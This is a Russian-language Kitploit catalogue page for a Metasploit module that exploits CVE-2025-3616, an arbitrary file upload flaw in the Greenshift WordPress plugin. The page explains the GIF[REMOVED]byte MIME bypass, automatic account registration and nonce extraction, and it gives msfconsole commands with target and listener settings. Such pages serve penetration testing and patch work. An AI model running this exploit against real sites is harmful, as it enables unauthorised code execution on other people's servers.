Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3616 — Модуль Metasploit, эксплуатирующий произвольную загрузку файлов в плагине Greenshift WordPress (CVE-2025-3616) для достижения RCE через подделку MIME, с автоматической регистрацией и извлечением nonce. | Kitploit
Инструменты/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияРазработка Полезной Нагрузки
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Модуль Metasploit, эксплуатирующий произвольную загрузку файлов в плагине Greenshift WordPress (CVE-2025-3616) для достижения RCE через подделку MIME, с автоматической регистрацией и извлечением nonce.

Репозиторий
27 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Metasploit-модуль: Greenshift WordPress Plugin Arbitrary File Upload (CVE-2025-3616)

Этот репозиторий содержит Metasploit-модуль для эксплуатации CVE-2025-3616 — уязвимости произвольной загрузки файлов в плагине Greenshift для WordPress (версии с 11.4 по 11.4.5).

Эксплойт позволяет аутентифицированным пользователям (Subscriber+) загружать произвольные файлы, что приводит к удалённому выполнению кода (RCE). Он обходит проверку типа файлов в плагине, подделывая MIME-тип с помощью GIF-магических байтов (GIF89a;).

Возможности

  • Обработка аутентификации: поддерживает вход с существующими учётными данными (USERNAME/PASSWORD).
  • Авторегистрация: включает опцию REGISTER для автоматической регистрации нового пользователя и эксплуатации уязвимости с использованием свежих сессионных cookie (полезно, если на целевом сайте включена регистрация).
  • Извлечение nonce: автоматически извлекает требуемый nonce wp_rest из административной панели.
  • Обход защиты: добавляет GIF-магические байты к PHP-пейлоаду, чтобы обойти проверку finfo_file().
  • Установка

    1. Убедитесь, что у вас установлен Metasploit Framework.

    2. Скопируйте wp_greenshift_file_upload.rb в каталог локальных модулей:

      root@kitploit:~
      mkdir -p ~/.msf4/modules/exploits/unix/webapp/
      cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
      
    3. Запустите msfconsole и перезагрузите модули:

      root@kitploit:~
      msfconsole
      msf6 > reload_all
      

    Использование

    1. Использование авторегистрации (рекомендуется)

    Если на целевом сайте включена регистрация пользователей, учётные данные не нужны.

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER true
    run
    

    2. Использование существующих учётных данных

    Если у вас уже есть действительный пользователь (Subscriber или выше):

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER false
    set USERNAME <USER>
    set PASSWORD <PASS>
    run
    

    Параметры

    ПараметрОбязательныйОписание
    RHOSTSдаАдрес целевого хоста
    LHOSTдаАдрес прослушивания (ваш IP)
    REGISTERнетУстановите true, чтобы автоматически зарегистрировать новую учётную запись (по умолчанию: false)
    USERNAMEнетИмя пользователя WordPress (обязательно, если REGISTER установлен в false)
    PASSWORDнетПароль WordPress (обязательно, если REGISTER установлен в false)
    EMAILнетEmail для регистрации (необязательно, генерируется автоматически, если пусто)

    Отказ от ответственности

    Этот модуль предназначен только для образовательных целей и авторизованного тестирования на проникновение. Использование этого кода для атак на цели без предварительного взаимного согласия незаконно.

    Скачать инструмент